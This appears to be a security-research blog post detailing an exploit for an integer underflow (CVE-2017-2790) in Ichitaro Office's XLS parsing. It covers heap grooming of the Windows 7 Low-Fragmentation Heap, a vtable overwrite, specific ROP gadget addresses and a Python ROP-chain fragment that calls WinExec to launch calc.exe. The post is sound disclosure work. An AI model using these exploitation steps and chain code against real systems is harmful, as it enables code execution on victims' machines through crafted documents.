This vulnerability was discovered by Cory Duplantis and another member of Cisco Talos.


Overview
Vulnerabilities in word processing and office productivity suites are useful targets for exploitation by threat actors. Users frequently encounter the file types used by these software suites in their day-to-day lives and may not question opening such a file from an email or being prompted to download one from a website.

Some word processing software is widely used within communities using a specific language, but poorly known elsewhere. For example, Hancom's Hangul Word Processor is widely used within South Korea, and the Ichitaro Office suite from JustSystems is widely used in Japan and Japanese-speaking communities. Exploiting vulnerabilities in these and similar word processing systems allows attackers to target a specific country or the linguistic community of their intended victims. Attackers may also expect exploits against these systems to be less likely to be discovered, since security researchers may lack the software that the vulnerability targets.

The recent discovery by Talos of a sophisticated attack exploiting Hangul Word Processor underlines the ability of attackers with the necessary technical skills to create malicious files that target local office productivity suite software.

Talos has discovered three vulnerabilities within the Ichitaro Office suite, one of the most popular word processors used in Japan.

We have no indication that any of the three vulnerabilities we discovered in the Ichitaro Office suite have been exploited in the wild. Nevertheless, all three lead to a state where arbitrary code can be executed. We have chosen one of these vulnerabilities to explain in more detail how such a vulnerability may be exploited and to demonstrate what remote code execution means by launching calc.exe as an example.

The advisory for this particular vulnerability can be found here: http://www.talosintelligence.com/reports/TALOS-2016-0197

Deep Dive - TALOS-2016-0197 (CVE-2017-2790) - JustSystems Ichitaro Office Excel File Code Execution Vulnerability
This vulnerability revolves around an unchecked integer underflow of the size of a record of type 0x3c within a Workbook stream in an XLS file handled by Ichitaro.

While reading a Continue record (type 0x3c), the application calculates the number of bytes it needs to copy into memory. This calculation subtracts one from a 16-bit value read from the file itself; when that value is zero, the subtraction causes an integer underflow.

JCXCALC!JCXCCALC_Jsfc_ExConvert+0xa4b1e:
44b48cda 8b461e          mov     eax,dword ptr [esi+1Eh] // File data from Continue Record
44b48cdd 668b4802        mov     cx,word ptr [eax+2]     // Size from file (in our case 0)
...
44b48ce4 6649            dec     cx                      // Underflow the 0 to be 0xffff
...
44b48ce8 894d08          mov     dword ptr [ebp+8],ecx   // Store the 0xffff for later use
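
The effect of the dec cx instruction on a size of zero can be reproduced with 16-bit wraparound arithmetic. The following is a minimal Python sketch; the helper name dec16 is an illustrative assumption and does not appear in the application.

```python
def dec16(value: int) -> int:
    """Model `dec cx`: subtract one and wrap the result to 16 bits."""
    return (value - 1) & 0xFFFF


size_from_file = 0                 # size field read from the Continue record
copy_size = dec16(size_from_file)  # value later stored at [ebp+8]
print(hex(copy_size))              # 0xffff
```

Any non-zero size simply decreases by one; only the zero case wraps around to the largest 16-bit value.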

Later in the same function, this underflowed value is passed to the function handling the copying of file data.

JCXCALC!JCXCCALC_Jsfc_ExConvert+0xa4b46:
44b48d04 0fb75508        movzx   edx,word ptr [ebp+8]   // Store 0xffff into edx
...
44b48d1f 52              push    edx                    // Push size
44b48d20 51              push    ecx                    // Push destination address 
44b48d21 83c005          add     eax,5
44b48d24 52              push    edx                    // Push size
44b48d25 50              push    eax                    // Push source address
44b48d26 e8c5f7ffff      call    JCXCALC!JCXCCALC_Jsfc_ExConvert+0xa4334 (44b484f0)


The main copy function does have a check to ensure that the size is greater than zero. The underflowed value of 0xffff, however, passes every check. Below is the copy function commented with relevant variable names. Note that because the same register is pushed twice in the assembly above, size and size_ in the C code below hold the same value.

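// Decompiled copy routine at JCXCALC!JCXCCALC_Jsfc_ExConvert+0xa4334.
// The name copy_record_data is illustrative only.
int copy_record_data(const unsigned char *src, int size, unsigned char *dst, int size_)
{
  int result = 0;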
  if ( !size_ )
    return size;
  if ( size > size_ )
    return 0;
  if ( size > 0 )
  {
    result = size;
    do
    {
      *dst = *src++;
      ++dst;
      --size;
    }
    while ( size );
  }
  return result;
}

The dst address points to an allocation whose size is also taken from the file, from the surrounding TxO record (type 0x1b6). This size is multiplied by 2 before being passed to malloc.

JCXCALC!JCXCCALC_Jsfc_ExConvert+0xa4a1c:
442c8bd8 668b470e        mov     ax,word ptr [edi+0Eh] // Size from TxO element
442c8bdc 50              push    eax
442c8bdd e88b87f6ff      call    JCXCALC!JCXCCALC_Jsfc_ExConvert+0xd1b1 (4423136d)
JCXCALC!JCXCCALC_Jsfc_ExConvert+0xd1b1:
4423136d 0fb7442404      movzx   eax,word ptr [esp+4]
44231372 d1e0            shl     eax,1     // Attacker size * 2
44231374 50              push    eax
44231375 ff1580d42f44    call    ds:malloc // Controlled malloc
4423137b 59              pop     ecx
4423137c c3              ret

To recap, the vulnerability gives the following constructs to an attacker:

* A memory allocation whose size is a controlled 16-bit value multiplied by 2
* A memcpy-style copy of 0xffff bytes of attacker-controlled file data into that allocation
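
To make the recap concrete, the sketch below computes how far the copy can run past the end of the allocation for a given TxO size. It is a simplified model that assumes the copy runs to completion; the function names are hypothetical and chosen only for illustration.

```python
def malloc_size(txo_size: int) -> int:
    """Model `movzx eax, word` followed by `shl eax, 1`."""
    return (txo_size & 0xFFFF) << 1


def overflow_bytes(txo_size: int, continue_size: int) -> int:
    """Upper bound on bytes written past the end of the allocation."""
    copy_size = (continue_size - 1) & 0xFFFF  # underflows when continue_size == 0
    return max(0, copy_size - malloc_size(txo_size))


print(hex(malloc_size(0x0C)))        # 0x18
print(hex(overflow_bytes(0x0C, 0)))  # 0xffe7
```

A TxO size of 0x0c gives an allocation of 0x18 bytes, so a Continue record with a size of zero can overwrite up to 0xffe7 bytes beyond it.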

Overwrite target
If we wanted to exploit this vulnerability on Windows 7, the question now is: what is a good target to overwrite using the memcpy? One avenue is to overwrite the vtable pointer of an object that uses virtual methods, so that the program counter can be controlled through an attacker-supplied pointer.

In order for this to be feasible, our object needs to be created with the following parameters:

* Object must be allocated with a predictable size into the heap's arena
* Object must be using virtual methods and have a virtual method table (vtable).
* Object must be destroyed after the overwrite happens.

An XLS file is composed of multiple document streams, where each stream is separated into different records. Each record can be described as a Type-Length-Value (TLV) structure: the record specifies its type in the first two bytes, followed by a two-byte length, followed by that many bytes of data.

A small diagram is shown below:

+------+--------+------------+
| Type | Length | Value      |
+------+--------+------------+
struct Record {
    uint16_t type;
    uint16_t length;
    byte[length] value;
}

As an example, a record of type 0x3c that will contain the value of 0xdeadbeef would look like the following (length is 4 due to 0xdeadbeef being 4 bytes).

+--------+--------+------------+
|Type    | Len    | Value      |
+--------+--------+------------+
| 0x003c | 0x0004 | 0xdeadbeef |
+--------+--------+------------+
<class excel.RecordGeneral>
[0] <instance uint2 'type'> +0x003c (60)
[2] <instance uint2 'length'> +0x0004 (4)
[4] <instance Continue 'data'> "\xad\xde\xeb\xfe"
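
The record layout above can be sketched in Python with the struct module. The header fields are packed as little-endian 16-bit integers; the helper names build_record and iter_records are assumptions made for this example, and the byte order chosen for the 4-byte value (a 32-bit little-endian integer) is likewise only illustrative.

```python
import struct


def build_record(rec_type: int, value: bytes) -> bytes:
    """Serialize one record: uint16 type, uint16 length, then the value."""
    return struct.pack("<HH", rec_type, len(value)) + value


def iter_records(stream: bytes):
    """Yield (type, value) pairs for each complete record in a stream."""
    offset = 0
    while offset + 4 <= len(stream):
        rec_type, length = struct.unpack_from("<HH", stream, offset)
        offset += 4
        yield rec_type, stream[offset:offset + length]
        offset += length


record = build_record(0x003C, struct.pack("<I", 0xDEADBEEF))
print(record.hex())  # 3c000400efbeadde
for rec_type, value in iter_records(record):
    print(hex(rec_type), len(value))  # 0x3c 4
```

A parser built this way trusts the length field completely, which is why a crafted length has such a direct effect on later processing.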

The parser would then iterate through all the records in the stream and then parse each record based on the type and value described by the record. Due to our third constraint for our target record, we want a type that creates some object with a vtable during parsing, but doesn't free that object until some point after parsing the entire stream.

After research into the various types of records that the application is able to parse, it was discovered that the Row record has the following properties:

* Allocates a data structure of size 0x14
* This element's object does contain a vtable
* This element's object is destroyed during the parsing of the EOF record by calling its virtual destructor.

This means that an attacker could construct a file that contains a Row record, a few other specific records to precisely control memory, and then overwrite the Row object's vtable pointer. After this, they can conclude with an EOF record, which triggers a call through the overwritten vtable when the Row object is destroyed.

The plan at this point is to position our overwrite from the TxO record before a previously allocated Row object in order to use it to overwrite the Row object's vtable.

To position the attacker-controlled allocation before the Row object, the Windows 7 Low-Fragmentation Heap needs to be abused. A simplified explanation follows.

Low-Fragmentation Heap
Windows 7 organizes its heap relative to the PEB and uses a combination of two allocators: a backend and a frontend. The frontend heap is an arena-based allocator known as the Low-Fragmentation Heap (LFH). It is mostly documented in Chris Valasek's paper on the Low-Fragmentation Heap: http://illmatics.com/Understanding_the_LFH.pdf

An important characteristic of the LFH is that allocations are bucketed into chunks whose sizes are multiples of 8. When a heap allocation is made, its size is divided by 8 and the result is used to determine which segment to return chunks from. Once the segment is identified, a pointer within the segment points to the arena that chunks of that size are returned from. This means that the space allocated for the Row object (0x14) is rounded up to bucket 0x18. For bucket 0x18, there are 255 slots available in the arena.
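
The bucket rounding described above amounts to rounding a request up to the next multiple of 8. The sketch below follows the simplified description in this post and ignores any per-chunk header; the function name lfh_bucket is an assumption for illustration.

```python
def lfh_bucket(size: int, granularity: int = 8) -> int:
    """Round an allocation size up to the next multiple of the granularity."""
    return (size + granularity - 1) // granularity * granularity


print(hex(lfh_bucket(0x14)))  # 0x18, the Row object
print(hex(lfh_bucket(0x18)))  # 0x18, already aligned
```

Any request from 0x11 to 0x18 bytes therefore lands in the same bucket as the Row object, which is what lets an attacker-sized allocation share its arena.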

Segment

   
+-------+-------+--------------------------------+-----------+-------+
|  ...  | Arena | AggregateExchg.FreeEntryOffset | BlockSize |  ...  |
+-------+-------+--------------------------------+-----------+-------+
 Arena
+-----------------+-----+-----------+---------+---------+------------+
| Segment Pointer | ... | Signature | Block 1 | Block 2 | Block X... |
+-----------------+-----+-----------+---------+---------+------------+

Another important characteristic of the LFH is that it isn't actually used until the allocations of the target application follow a particular pattern. Until this happens, allocations are served by the backend allocator. To ensure the LFH is used for a particular bucket size, the target application must make 0x12 (18) allocations of the same size. Once this is done, any further allocations of that size are served by the frontend allocator. It was discovered that the Palette record is very flexible and can be used to make arbitrary allocations that are never freed. The steps to enable LFH for a bucket then are:

* Allocate 0x12 allocations of the same size using the Palette record.
* Make 255 allocations to force the allocator to allocate a new segment.
(Note: This can be consolidated into just making 255 - 0x12 allocations.)

When first allocating a segment, the platform will initialize the segment with an offset into the arena that determines the first chunk that is returned. When the arena for the segment is allocated, each chunk is pre-written with a 16-bit offset (FreeEntryOffset) that represents the offset to the next heap chunk to be returned. When an allocation is made, the 16-bit offset will be read from the beginning of the next free chunk within the arena and stored within the segment. The 16-bit offset in the chunk will then be overwritten as it is part of the allocation requested by the application.

Arena - Beginning

 
+----------------+--------------------+----------------+----------------+
| Block 1 (Busy) | Block 2 (Free)     | Block 3 (Free) | Block X (Free) |
| Data: ...      | FreeEntryOffset: 3 | FEO: 4         | FEO: X+1       |
+----------------+--------------------+----------------+----------------+

This way when another allocation is made, the allocator will set the FreeEntryOffset in the segment with the one in the chunk that is being allocated so that during the next allocation it will know the next chunk to return. When allocating a chunk, an atomic swap operation is performed between the offset in the chunk to be returned and the offset that's located within the segment. This prevents concurrency issues when more than one thread is allocating from the same segment/arena.

    State 0 - Beginning
    Next slot: 3
    Offset to Block 3 currently loaded into segment
    v 
    +--------------------+--------------------+----------------------+
    | Block 3 (Free)     | Block 4 (Free)     | Block X (Free)       |
    | FreeEntryOffset: 4 | FreeEntryOffset: 5 | FreeEntryOffset: X+1 |
    +--------------------+--------------------+----------------------+
    State 1 - malloc
    Returns slot 3. Loads FreeEntryOffset from Block 3 into segment.
    Next slot: 4
                     Now offset to Block 4 is loaded into segment
                     v
    +----------------+--------------------+----------------------+
    | Block 3 (Busy) | Block 4 (Free)     | Block X (Free)       |
    | Data: ...      | FreeEntryOffset: 5 | FreeEntryOffset: X+1 |
    +----------------+--------------------+----------------------+
    State 2 - malloc
    Returns slot 4. Loads FreeEntryOffset from Block 4 into segment.
    Next slot: 5
                                      Offset to Block 5 is loaded into segment
                                      v
    +----------------+----------------+----------------------+
    | Block 3 (Busy) | Block 4 (Busy) | Block X (Free)       |
    | Data: ...      | Data: ...      | FreeEntryOffset: X+1 |
    +----------------+----------------+----------------------+

The offsets are written into the same memory region as the chunk that is returned, so once the application uses the chunk they are overwritten by whatever data the application stores there. Because these offsets sit inside the free chunks of the arena until an allocation happens, an overflow from a neighboring chunk can overwrite them, tricking the allocator into returning a chunk anywhere in the arena. The overflow from the TxO record is used to overwrite the offset stored in the next free chunk so that the allocator returns a slot of the attacker's choosing.

State 0 - Beginning
Next slot: 4

                    v
+----------------+--------------------+--------------------+
| Block 3 (Busy) | Block 4 (Free)     | Block 5 (Free)     |
|                | FreeEntryOffset: 5 | FreeEntryOffset: 6 |
+----------------+--------------------+--------------------+

State 1 - TxO Record
Returns slot 4. Loads FreeEntryOffset (5) from Block 4 into segment.
Next slot: 5
                                    v
+----------------+------------------+--------------------+
| Block 3 (Busy) | Block 4 (Busy)   | Block 5 (Free)     |
|                | Data: TxO Record | FreeEntryOffset: 6 |
+----------------+------------------+--------------------+

State 2 - TxO overwrites FreeEntryOffset
At this point, the FreeEntryOffset for the next block is overwritten with XXX.
In this example, we'll use 3 to return Block 3

                                    v
+----------------+------------------+----------------------+
| Block 3 (Busy) | Block 4 (Busy)   | Block 5 (Free)       |
|                | Data: TxO Record | FreeEntryOffset: XXX |
+                +         -------------------->           |
+----------------+------------------+----------------------+

State 3 - malloc
The allocator will return Block 5 as it was the next block.
The FreeEntryOffset in Block 5 will be loaded into the segment
for the next allocation.

If the TxO record overwrote this value with 3, this would mean Block 3
would be returned as the next chunk.

v
+----------------+------------------+----------------+
| Block 3 (Busy) | Block 4 (Busy)   | Block 5 (Busy) |
|                | Data: TxO Record | Data: ...      |
+                +         -------------------->     |
+----------------+------------------+----------------+

State 4 - malloc
Returns Block 3. The first 16-bit word inside Block 3 will also be loaded
into the segment.

+----------------+------------------+----------------+
| Block 3 (Busy) | Block 4 (Busy)   | Block 5 (Busy) |
|                | Data: TxO Record | Data: ...      |
+----------------+------------------+----------------+
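
The state sequence above can be replayed with a toy model of the arena. This is only a sketch of the mechanism as described in this post, not of the real Windows allocator: the class ToyArena, its fields, and the value 0x1234 standing in for the first word of the busy Block 3 are all assumptions made for illustration.

```python
class ToyArena:
    """Toy arena: the first word of each block is read as its FreeEntryOffset."""

    def __init__(self, first_words, next_slot):
        self.first_words = dict(first_words)  # block index -> first 16-bit word
        self.next_slot = next_slot            # offset cached in the segment

    def malloc(self) -> int:
        block = self.next_slot
        # The allocator trusts whatever is stored at the start of the block.
        self.next_slot = self.first_words[block]
        return block


# State 0: Block 3 is busy (its first word is application data), next slot is 4.
arena = ToyArena({3: 0x1234, 4: 5, 5: 6, 6: 7}, next_slot=4)

txo = arena.malloc()        # State 1: the TxO buffer lands in Block 4
arena.first_words[5] = 3    # State 2: the overflow rewrites Block 5's offset
filler = arena.malloc()     # State 3: Block 5 is returned, segment now holds 3
reused = arena.malloc()     # State 4: Block 3 is handed out a second time

print(txo, filler, reused)  # 4 5 3
```

After the last call the segment holds whatever happened to be stored at the start of Block 3, which matches the note under State 4.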

This positions an attacker in an optimal situation for overwriting an object that has been allocated earlier within the process's timeline. The following steps can be used to position the TxO buffer in front of the Row object in order to overwrite its vtable.

    * Use TxO record to make an allocation of size 0x18 to be in the same arena as the Row object.
    * Overflow the TxO record to overwrite the FreeEntryOffset.
    * Allocate a Row object. This forces the overwritten FreeEntryOffset to be loaded into the segment.
    * Allocate another TxO record of the same size which will be positioned in front of the Row object.
    * Overflow the TxO record into the chunk containing the Row object in order to control its vtable.

After this occurs, parsing the last EOF record will cause the Row object's vtable to be dereferenced in order to call the destructor for the Row object.

    0:000> r

    eax=deadbeeb ebx=ffffffff ecx=045d7d88 edx=0000ffff esi=00127040 edi=00000000
    eip=3f7205c7 esp=00126fdc ebp=00127028 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    JCXCALC!JCXCCALC_Jsfc_ExConvert+0x9c40b:
    3f7205c7 ff5004          call    dword ptr [eax+4]    ds:0023:deadbeef=????????
    0:000> .logclose
    0:000> dc ecx
    045d7d88  deadbeeb 64646464 64646464 64646464  dddddddddddddddd
    045d7d98  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7da8  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7db8  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7dc8  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7dd8  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7de8  64646464 64646464 64646464 64646464  dddddddddddddddd
    045d7df8  64646464 64646464 64646464 64646464  dddddddddddddddd

The attacker is now controlling a called function pointer.

Code Execution
Looking at the state at the crash, the attacker controls the pointer being called, and ecx points to an attacker-controlled buffer. To achieve code execution, the next step is to search the available ROP gadgets for a stack pivot. The goal is for the attacker to control EIP and to have the stack pointing into attacker-controlled data. Luckily, the following modules are in the process space and are not affected by ASLR.

 0:000> !py mona mod -cm aslr=false
--------------------------------------------------
Module info :
--------------------------------------------------
Base       || Size       | ASLR  | Modulename,Path
--------------------------------------------------
0x5f800000 || 0x000b1000 | False | [JSFC.DLL]
0x026b0000 || 0x00007000 | False | [jsvdex.dll]
0x27080000 || 0x000e1000 | False | [JSCTRL.DLL]
0x3f680000 || 0x00103000 | False | [JCXCALC.DLL]
0x22150000 || 0x00018000 | False | [JSMACROS.DLL]
0x003b0000 || 0x00008000 | False | [JSCRT40.dll]
0x61000000 || 0x0013b000 | False | [JSAPRUN.DLL]
0x3c7c0000 || 0x01611000 | False | [T26com.DLL]
0x23c60000 || 0x00024000 | False | [JSDFMT.dll]
0x03ad0000 || 0x0000b000 | False | [JSTqFTbl.dll]
0x40030000 || 0x0002c000 | False | [JSFMLE.dll]
0x21480000 || 0x00082000 | False | [jsgci.dll]
0x02430000 || 0x00008000 | False | [JSSPLEX.DLL]
0x43ab0000 || 0x003af000 | False | [T26STAT.DLL]
0x217b0000 || 0x0001b000 | False | [JSDOC.dll]
0x22380000 || 0x0007a000 | False | [JSFORM.OCX]
0x211a0000 || 0x00049000 | False | [JSTDLIB.DLL]
0x21e50000 || 0x0002c000 | False | [JSPRMN.dll]
0x02a80000 || 0x0000e000 | False | [jsvdex2.dll]
0x277a0000 || 0x00086000 | False | [jsvda.dll]
0x61200000 || 0x000c6000 | False | [JSHIVW2.dll]
0x49760000 || 0x00009000 | False | [Jsfolder.dll]
0x210f0000 || 0x000a1000 | False | [JSPRE.dll]
0x213e0000 || 0x00022000 | False | [jsmisc32.dll]

Needless to say, there is an abundance of ROP gadgets available in these modules. The only problem is that the attacker cannot call a gadget directly: the crashing instruction calls through a vtable entry, so the attacker must supply the address of a memory location that itself contains a pointer to the gadget. After compiling a list of ROP gadgets, a search across all of the modules is therefore necessary to see whether any of the gadget addresses appear as data in any of the modules, effectively looking for pointers to the found gadgets. Luckily again, the following gadget emerges.

    
file:JSFC.DLL
JSFC.DLL.gadgets.40
Gadget:0x5f8170bc : sub esp, 4
                    push ebx
                    push esi
                    mov eax, dword ptr [ecx + 0xa0]
                    push edi
                    push ebp
                    mov esi, ecx
                    test eax, eax
                    je 0x5f8170ee
                    push esi
                    call eax
Simplified
file:JSFC.DLL
gadget:0x5f8170bc : mov eax, dword ptr [ecx + 0xa0] ;
                    mov esi, ecx 
                    call eax
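
The pointer search described above can be sketched as a byte search for each gadget address in its little-endian form. This is a simplified illustration that treats a module as one flat byte string mapped at its base address; the function find_pointers and the synthetic image used in the example are assumptions, not the tooling used for this research.

```python
import struct


def find_pointers(image: bytes, base: int, gadget_addrs):
    """Map each gadget address to the addresses where it is stored as data."""
    hits = {}
    for addr in gadget_addrs:
        needle = struct.pack("<I", addr)  # 32-bit little-endian pointer
        pos = image.find(needle)
        while pos != -1:
            hits.setdefault(addr, []).append(base + pos)
            pos = image.find(needle, pos + 1)
    return hits


# Synthetic 16-byte "module" containing one stored pointer at offset 8.
image = b"\x00" * 8 + struct.pack("<I", 0x5F8170BC) + b"\x00" * 4
hits = find_pointers(image, 0x10000000, [0x5F8170BC, 0x5F83636E])
print({hex(k): [hex(v) for v in vs] for k, vs in hits.items()})
# {'0x5f8170bc': ['0x10000008']}
```

Only gadgets whose address is stored somewhere in memory are usable as the first call target, which is why the candidate list shrinks so sharply at this step.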

This gadget loads a pointer from the attacker-controlled buffer and calls it directly, so from this point on gadgets can be called by address. As a side effect of the first gadget, esi and ecx now both point to the same attacker-controlled buffer. The following gadget achieves the full stack pivot.

    
JSFC.DLL.gadgets.40
gadget:0x5f83636e : or bh, bh
                    push esi
                    pop esp
                    mov eax, edi
                    pop edi
                    pop esi
                    pop ebp
                    ret 0x1c
Simplified
file:JSFC.DLL
26051:0x5f83636e :  push esi
                    pop esp
                    ret 0x1c

The attacker now has full EIP and stack control, allowing for a proper ROP chain to be built.

    0:000> r
    eax=00000000 ebx=ffffffff ecx=04559138 edx=0000ffff esi=62626262 edi=5f86ecc8
    eip=deadbeef esp=0455926c ebp=62626262 iopl=0         nv up ei ng nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
    deadbeef ??              ???
    0:000> dc esp
    0455926c  61616161 61616162 61616163 61616164  aaaabaaacaaadaaa
    0455927c  61616165 61616166 61616167 61616168  eaaafaaagaaahaaa
    0455928c  61616169 6161616a 6161616b 6161616c  iaaajaaakaaalaaa
    0455929c  6161616d 6161616e 6161616f 61616170  maaanaaaoaaapaaa
    045592ac  61616171 61616172 61616173 61616174  qaaaraaasaaataaa
    045592bc  61616175 61616176 61616177 61616178  uaaavaaawaaaxaaa
    045592cc  61616179 6261617a 62616162 62616163  yaaazaabbaabcaab
    045592dc  62616164 62616165 62616166 62616167  daabeaabfaabgaab

At this point, the attacker could try to retrieve WinExec by walking the import table of one of the DLLs for an entry into ntdll. From ntdll, an offset can be retrieved into Kernel32. From Kernel32, the offset into WinExec can be retrieved and a direct command can be executed. Or...

    $ r2 -q -c 'ii~WinExec' T26COM.DLL
    ordinal=110 plt=0x3d46c47c bind=NONE type=FUNC name=KERNEL32.dll_WinExec

...WinExec could already be imported by one of the DLLs, and the attacker can simply use that address instead. A simple ROP chain is built to write the string calc.exe into memory and pass it to the WinExec pointer.

    command = [b'calc', b'.exe', b'\0\0\0\0']   # command in 4-byte chunks, NUL-terminated
    for i,substr in enumerate(command):
        payload += pop_ecx_ret_8                # pop ecx; ret 8
        payload += p32(writable_addr + (i*4))   # Buffer to write the command
        payload += pop_eax_ret                  # pop eax; ret
        payload += p32(0xdeadbeec)              # eaten by ret 8
        payload += p32(0xdeadbeed)              # eaten by ret 8
        payload += substr                       # Current four bytes to write
        payload += write_mem                    # mov dword [ecx], eax; xor eax, eax; ret
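
The command list used in the loop above is the NUL-terminated command string cut into 4-byte pieces, one per memory write. A minimal sketch of that chunking follows; the helper name dword_chunks is an assumption for illustration.

```python
def dword_chunks(command: bytes):
    """Split a command into 4-byte chunks, NUL-terminated and NUL-padded."""
    padded = command + b"\0"              # guarantee at least one terminator
    padded += b"\0" * (-len(padded) % 4)  # pad to a multiple of four bytes
    return [padded[i:i + 4] for i in range(0, len(padded), 4)]


print(dword_chunks(b"calc.exe"))
# [b'calc', b'.exe', b'\x00\x00\x00\x00']
```

Each chunk corresponds to one pass through the loop, with the destination advancing by four bytes per write.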

Once the command string is in memory, dereferencing the WinExec pointer and calling it with the buffer executes the wanted command.

    # Deref WinExec import
    payload += pop_edi_esi_ebx_ret
    payload += p32(winexec-0x64)    # pop edi (offset due to [edi + 0x64])
    payload += p32(0xdeadbeee)      # eaten by pop esi
    payload += p32(0xdeadbeef)      # eaten by pop ebx
    # Call WinExec with buffer pointing to calc.exe
    payload += deref_edi_call       # mov esi, dword [edi + 0x64]; call esi
    payload += p32(writable_addr)   # Buffer with command
    payload += p32(1)               # Display the calc (0 will hide the command output)

The exploit shown in the video below was built for Ichitaro 2016 v0.3.2612 running on Windows 7.

Conclusion
At first glance, a report stating that an application does not check that a size value supplied by a specific file format is greater than zero may sound like a bug rather than a vulnerability. We hope that this post goes some way toward describing how a very simple omission in program logic may be exploited by an exploit developer to create a weaponized file that can be used to execute arbitrary code on a victim's system.

The nature of vulnerabilities such as these, and their attractiveness to threat actors, is why keeping systems up to date with patches is vital. This is also why Talos develops and releases detection for every vulnerability that we find before we publish the details of the vulnerability.

Talos is committed to finding software vulnerabilities before the bad guys, and working with vendors in accordance with our responsible vulnerability disclosure policy to ensure that weaponized exploits such as this do not result in system compromise.

Snort Rules: 40125 - 40126, 41703 - 41704